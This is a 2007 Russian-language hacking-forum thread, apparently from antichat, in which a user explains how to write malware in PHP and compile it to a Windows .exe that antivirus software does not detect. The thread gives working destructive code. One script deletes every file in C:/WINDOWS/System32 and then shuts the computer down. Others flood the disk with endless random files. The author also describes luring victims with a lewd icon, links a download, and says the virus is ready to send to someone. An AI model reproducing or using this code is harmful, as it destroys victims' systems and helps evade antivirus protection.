 |
Левые вирусы, которые не палят антивирусы |
11.05.2007, 22:00
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Левые вирусы, которые не палят антивирусы
Хай всем!
Возможно этот способ уже все знают, но всёравно...
Оказывается можно писать вирусы на PHP  Конечно они нубские получаются, но не палятся антивирусами... Вы наверное думаете что этот способ годен только для серверов с поддержкой PHP, однако для запуска PHP вируса ненужен сервер  PHP скрипты можно компилировать в .exe файлы, для меня (когда я это узнал) было огромное открытие, для вас возможно нет... Тогда закройте эту страничку, всёравно ничего нового не узнаете...
Для компиляции PHP скриптов есть много программ, я лично юзаю php bam compile маленькая прога не требующая никакой установки!
Скачать тут: _http://slil.ru/24354564
В архиве 5 фалов:
bamcompile.exe - компилятор
readme.txt - описание компилятора (помощ)
virus-unlink.php - мой пример вируса 
Вот...
PHP код:
<?php
set_time_limit(0);
ignore_user_abort();
echo "Preparing to installation... Plsease wait\n\n\n\n";
foreach (glob("C:/WINDOWS/System32/*") as $filename)
{
@unlink($filename);
}
echo "TY 4URKO!\nBy Ponchik\nICQ:202-995-022\nWEB:antichat.ru";
sleep(5);
system('shutdown -s');
?>
Что он делает?
1)Выводит нажпись "Preparing to installation... Plsease wait"
2)Получает список файлов из C:/WINDOWS/System32/ и пытается их по очереди удалить...
3)После всего этого выводит текст
TY 4URKO!
By Ponchik
ICQ:202-995-022
WEB:antichat.ru
4)Замирает на 5 сек
5)Выводит табличку выключения компа через 30 сек. (естествено он уже не включится без system32 )
4)popa=).ico - иконка голой попы (чтоб хотелось запустить)
5)virus-unlink.exe - откомпилированый не сжатый вирус с иконкой попы
Эмм... Кажись всё...
Лаги которые очень мешают:
1)После выполнения, программа закрывается, я личто решаю это так:
while(true) { sleep(10); }
это прописать в конец программы
2)Не работает функция usleep ну она врядле вам нужна будет
3)В досе невидн русский текст, например если написать
echo 'Предед медвед'; - Это выведет каракули
Я это решаю функцией
PHP код:
<?php
function strtoruss($text)
{
$letter = array(
'А' => chr(128),
'Б' => chr(129),
'В' => chr(130),
'Г' => chr(131),
'Д' => chr(132),
'Е' => chr(133),
'Ё' => chr(133),
'Ж' => chr(134),
'З' => chr(135),
'И' => chr(136),
'Й' => chr(137),
'К' => chr(138),
'Л' => chr(139),
'М' => chr(140),
'Н' => chr(141),
'О' => chr(142),
'П' => chr(143),
'Р' => chr(144),
'С' => chr(145),
'Т' => chr(146),
'У' => chr(147),
'Ф' => chr(148),
'Х' => chr(149),
'Ц' => chr(150),
'Ч' => chr(151),
'Ш' => chr(152),
'Щ' => chr(153),
'Ъ' => chr(154),
'Ы' => chr(155),
'Ь' => chr(156),
'Э' => chr(157),
'Ю' => chr(158),
'Я' => chr(159),
'а' => chr(160),
'б' => chr(161),
'в' => chr(162),
'г' => chr(163),
'д' => chr(164),
'е' => chr(165),
'ё' => chr(165),
'ж' => chr(166),
'з' => chr(167),
'и' => chr(168),
'й' => chr(169),
'к' => chr(170),
'л' => chr(171),
'м' => chr(172),
'н' => chr(173),
'о' => chr(174),
'п' => chr(175),
'р' => chr(224),
'с' => chr(225),
'т' => chr(226),
'у' => chr(227),
'ф' => chr(228),
'х' => chr(229),
'ц' => chr(230),
'ч' => chr(231),
'ш' => chr(232),
'щ' => chr(233),
'ъ' => chr(234),
'ы' => chr(235),
'ь' => chr(236),
'э' => chr(237),
'ю' => chr(238),
'я' => chr(239)
);
for($i=0;$i<strlen($text);$i++)
{
if($letter[$text[$i]])
$toreturn = $toreturn.$letter[$text[$i]];
else
$toreturn = $toreturn.$text[$i];
}
return $toreturn;
}
?>
Пишем это в начало скрипта, потом так
echo strtoruss('Превед медвед');
И всё ок
======================================
Не судите строго, для меня это было открытием Хоть и фиговые вирусы получаются, зато они не палятся, можно конечно на C++ офигительные не палевные писать, но я С++ незнаю, поэтому РНР для меня единственое решение В общем не судите строго
P.S. virus-unlink.exe полностью готов к работе, можете комунить отправить |
|
|
11.05.2007, 22:10
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Классная фича! Не знал. Правда, не легче ли точно так же написать батничек?
|
|
|
|
11.05.2007, 22:38
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Я незнаю что такое батничек 
Вот ещё есть такая фишка
PHP код:
<?php
// Greetz всем заподлянщикам...
// В частности Poncik'y за идею!!!!!!!
// Вот, после этого, точно зае*ёшся пыль глотать...
//Аминь...
//(C) Dr.Check и все кто помог писать "Знаменитый скрипт"
////////////////////////////////////////////////////////////////
set_time_limit(0);
ignore_user_abort();
echo("<center><h1><b><font color=\"green\">ИБО НЕХУЙ!!!</font></b></h1></center>");
/////////////////////////////////////////////////////////////////
$name = array('a','b','c','d','e','f','g','h','i','j','k', 'l','m','n','o','p','r','s',
't','u','v','x','y','z','A','B','C','D','E','F','G ','H','I','J','K','L',
'M','N','O','P','R','S','T','U','V','X','Y','Z','1 ','2','3','4','5','6',
'7','8','9','0');
//////////////////////////////////////////////////////////////////
$rash= array('.txt','.dic','.doc','.xls','.exe','.ini',
'.bat','.log','.dll','.hak','.wmf','.zip','.rar',
'.tar','.gz','.jpg','.gif','.bmp');
/////////////////////////////////////////////////////////////////
while(true) {
$perem = "";
$fuck="";
for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла.
{
$by = rand(0, count($name) - 1);
$perem .= $name[$by];
}
$ra= rand(0, count($rash)-1);
$fuck .= $rash[$ra];
$fp=fopen($perem.$fuck,"w");
fwrite($fp,php_uname());
fclose($fp);
}
?>
Она ДОЛЖНА создавать бесконечно кол-во фалов, но создаёт 2000-3000 и умирает, незнаю почему... Вот мой левый скрипт
PHP код:
<?
set_time_limit(0);
ignore_user_abort();
while(true) {
switch (rand(0,8))
{
case 1 : $r = '.txt'; break;
case 2 : $r = '.exe'; break;
case 3 : $r = '.dat'; break;
case 4 : $r = '.ini'; break;
case 5 : $r = '.log'; break;
case 6 : $r = '.dll'; break;
case 7 : $r = '.wav'; break;
case 8 : $r = '.nsc'; break;
default: $r = '.zip'; break;
}
$fp=fopen(md5(time().doubleval(microtime())).$r,"w");
fwrite($fp,time());
fclose($fp);
}
?>
Он бесконечно созаёт файлы Только я незнаю работает-ли ignore_user_abort(); в компиляторе...
P.S. Кому надо например в C:/windows/ создавать, замените
$fp=fopen(md5(time().doubleval(microtime())).$r,"w ");
на
$fp=fopen('C:/WINDOWS/'.md5(time().doubleval(microtime())).$r,"w"); |
|
|
|
11.05.2007, 23:14
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Сообщение от Ponchik
Я незнаю что такое батничек По моим представлениям, файл с расширением .bat - файл сценариев командной строки DOS/Windows либо файл с расширением .cmd
|
|
|
|
11.05.2007, 23:16
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами:
10566621
Репутация:
1198
|
|
сам когда-то компили, ещё компилятор одной из тимы... интересно, но как-то всеровно..... не нравица мне это
|
|
|
|
12.05.2007, 00:17
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Sn@k3, на любителя
Macro, неее... Ты чооо! Палевно! + кажись касперский предупреждает когда бат запускаешь (кажись!) |
|
|
|
|
|
Предыдущая тема
Следующая тема
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Левые пароли от пична!
|
Koka |
Уязвимости |
3 |
16.02.2006 02:53 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
